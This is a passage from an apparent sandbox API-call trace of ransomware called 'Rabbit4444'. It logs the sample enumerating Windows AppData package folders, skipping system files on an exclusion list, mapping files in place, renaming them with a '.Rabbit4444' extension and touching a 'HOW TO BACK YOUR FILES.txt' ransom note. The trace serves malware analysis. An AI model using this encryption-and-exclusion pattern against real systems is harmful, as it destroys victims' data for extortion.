dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.403] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.405] FlushFileBuffers (hFile=0x228) returned 1 [0066.406] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.406] CloseHandle (hObject=0x228) returned 1 [0066.407] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\Settings") returned 105 [0066.407] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.407] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\Settings\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x740ca625, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x740ca625, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf0e7d620, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1025d0 [0066.407] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.407] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.407] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.407] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.407] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x740ca625, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x740ca625, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf0e7d620, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.407] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.407] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.407] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.407] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.407] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.407] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0e7d620, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0e7d620, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0e7d620, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.407] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.407] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.407] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x740ca625, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x740ca625, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x740ca625, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0066.407] lstrcmpiW (lpString1="roaming.lock", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.407] lstrcmpiW (lpString1="roaming.lock", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.408] lstrcmpiW (lpString1="roaming.lock", lpString2="Rabbit4444.exe") returned 1 [0066.408] lstrcmpiW (lpString1="roaming.lock", lpString2=".") returned 1 [0066.408] lstrcmpiW (lpString1="roaming.lock", lpString2="..") returned 1 [0066.408] lstrcmpiW (lpString1="roaming.lock", lpString2="windows") returned -1 [0066.408] lstrcmpiW (lpString1="roaming.lock", lpString2="bootmgr") returned 1 [0066.408] lstrcmpiW (lpString1="roaming.lock", lpString2="pagefile.sys") returned 1 [0066.408] lstrcmpiW (lpString1="roaming.lock", lpString2="boot") returned 1 [0066.408] lstrcmpiW (lpString1="roaming.lock", lpString2="ids.txt") returned 1 [0066.408] lstrcmpiW (lpString1="roaming.lock", lpString2="NTUSER.DAT") returned 1 [0066.408] lstrcpyW (in: lpString1=0x130ec0c, lpString2="roaming.lock" | out: lpString1="roaming.lock") returned="roaming.lock" [0066.408] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\Settings\\roaming.lock", dwFileAttributes=0x0) returned 1 [0066.408] lstrlenW (lpString="roaming.lock") returned 12 [0066.408] lstrlenW (lpString="Rabbit4444") returned 10 [0066.408] lstrcmpiW (lpString1="aming.lock", lpString2="Rabbit4444") returned -1 [0066.408] lstrlenW (lpString=".dll") returned 4 [0066.408] lstrcmpiW (lpString1="lock", lpString2=".dll") returned 1 [0066.408] lstrlenW (lpString=".lnk") returned 4 [0066.408] lstrcmpiW (lpString1="lock", lpString2=".lnk") returned 1 [0066.408] lstrlenW (lpString=".ini") returned 4 [0066.408] lstrcmpiW (lpString1="lock", lpString2=".ini") returned 1 [0066.408] lstrlenW (lpString=".sys") returned 4 [0066.408] lstrcmpiW (lpString1="lock", lpString2=".sys") returned 1 [0066.408] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x740ca625, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x740ca625, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x55d5013a, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0066.408] lstrcmpiW (lpString1="settings.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.409] lstrcmpiW (lpString1="settings.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.409] lstrcmpiW (lpString1="settings.dat", lpString2="Rabbit4444.exe") returned 1 [0066.409] lstrcmpiW (lpString1="settings.dat", lpString2=".") returned 1 [0066.409] lstrcmpiW (lpString1="settings.dat", lpString2="..") returned 1 [0066.409] lstrcmpiW (lpString1="settings.dat", lpString2="windows") returned -1 [0066.409] lstrcmpiW (lpString1="settings.dat", lpString2="bootmgr") returned 1 [0066.409] lstrcmpiW (lpString1="settings.dat", lpString2="pagefile.sys") returned 1 [0066.409] lstrcmpiW (lpString1="settings.dat", lpString2="boot") returned 1 [0066.409] lstrcmpiW (lpString1="settings.dat", lpString2="ids.txt") returned 1 [0066.409] lstrcmpiW (lpString1="settings.dat", lpString2="NTUSER.DAT") returned 1 [0066.409] lstrcpyW (in: lpString1=0x130ec0c, lpString2="settings.dat" | out: lpString1="settings.dat") returned="settings.dat" [0066.409] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\Settings\\settings.dat", dwFileAttributes=0x0) returned 1 [0066.409] lstrlenW (lpString="settings.dat") returned 12 [0066.409] lstrlenW (lpString="Rabbit4444") returned 10 [0066.409] lstrcmpiW (lpString1="ttings.dat", lpString2="Rabbit4444") returned 1 [0066.409] lstrlenW (lpString=".dll") returned 4 [0066.409] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0066.409] lstrlenW (lpString=".lnk") returned 4 [0066.409] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0066.409] lstrlenW (lpString=".ini") returned 4 [0066.409] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0066.409] lstrlenW (lpString=".sys") returned 4 [0066.409] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0066.409] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkconnectionflow_cw5n1h2txyewy\\settings\\settings.dat"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0066.410] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0066.410] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15772053161) returned 1 [0066.410] GetFileSizeEx (in: hFile=0x27c, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8192) returned 1 [0066.410] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0066.410] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0066.410] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2300, lpName=0x0) returned 0x260 [0066.411] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2300) returned 0x70000 [0066.413] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0066.413] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0066.413] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0066.413] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0066.413] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0066.413] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0066.413] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0066.413] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0066.413] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15772391347) returned 1 [0066.413] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0066.413] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0066.413] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.413] CloseHandle (hObject=0x260) returned 1 [0066.413] CloseHandle (hObject=0x27c) returned 1 [0066.414] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\Settings\\settings.dat.Rabbit4444") returned 129 [0066.414] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkconnectionflow_cw5n1h2txyewy\\settings\\settings.dat"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\Settings\\settings.dat.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkconnectionflow_cw5n1h2txyewy\\settings\\settings.dat.rabbit4444"), dwFlags=0x1) returned 1 [0066.416] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x740ca625, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x740ca625, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x55d5013a, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat", cAlternateFileName="")) returned 0 [0066.416] FindClose (in: hFindFile=0x1025d0 | out: hFindFile=0x1025d0) returned 1 [0066.416] lstrcpyW (in: lpString1=0x130ec0c, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.416] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\Settings\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkconnectionflow_cw5n1h2txyewy\\settings\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.416] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.417] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.418] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.418] CloseHandle (hObject=0x27c) returned 1 [0066.418] CloseHandle (hObject=0x228) returned 1 [0066.418] GetCurrentThreadId () returned 0xd98 [0066.418] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122168 [0066.418] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\RoamingState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\RoamingState" [0066.418] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x125740 | out: hHeap=0xe0000) returned 1 [0066.418] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122160 | out: hHeap=0xe0000) returned 1 [0066.418] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\RoamingState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\RoamingState" [0066.418] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\RoamingState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\RoamingState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\RoamingState\\" [0066.418] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\RoamingState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3" [0066.418] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkconnectionflow_cw5n1h2txyewy\\roamingstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.419] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.422] FlushFileBuffers (hFile=0x228) returned 1 [0066.422] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.423] CloseHandle (hObject=0x228) returned 1 [0066.423] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\RoamingState") returned 109 [0066.423] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.423] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\RoamingState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x740ca625, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x740ca625, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf0ea389d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1026d0 [0066.423] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.423] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.423] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.423] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.423] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x740ca625, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x740ca625, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf0ea389d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.423] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.423] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.423] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.424] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.424] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.424] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0ea389d, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0ea389d, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0ea389d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.424] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.424] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.424] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0ea389d, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0ea389d, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0ea389d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0066.424] FindClose (in: hFindFile=0x1026d0 | out: hFindFile=0x1026d0) returned 1 [0066.424] lstrcpyW (in: lpString1=0x130ec14, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.424] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\RoamingState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkconnectionflow_cw5n1h2txyewy\\roamingstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.424] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.424] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.425] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.425] CloseHandle (hObject=0x27c) returned 1 [0066.425] CloseHandle (hObject=0x228) returned 1 [0066.425] GetCurrentThreadId () returned 0xd98 [0066.425] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222e8 [0066.425] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\LocalState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\LocalState" [0066.425] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11b6c8 | out: hHeap=0xe0000) returned 1 [0066.425] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222e0 | out: hHeap=0xe0000) returned 1 [0066.425] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\LocalState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\LocalState" [0066.425] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\LocalState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\LocalState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\LocalState\\" [0066.425] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\LocalState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3" [0066.425] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkconnectionflow_cw5n1h2txyewy\\localstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.427] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.430] FlushFileBuffers (hFile=0x228) returned 1 [0066.431] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.431] CloseHandle (hObject=0x228) returned 1 [0066.431] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\LocalState") returned 107 [0066.431] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.431] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\\LocalState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x740ca625, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x740ca625, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf0ea389d, ftLastWriteTime.dwHighDateTime=0x1d54052, 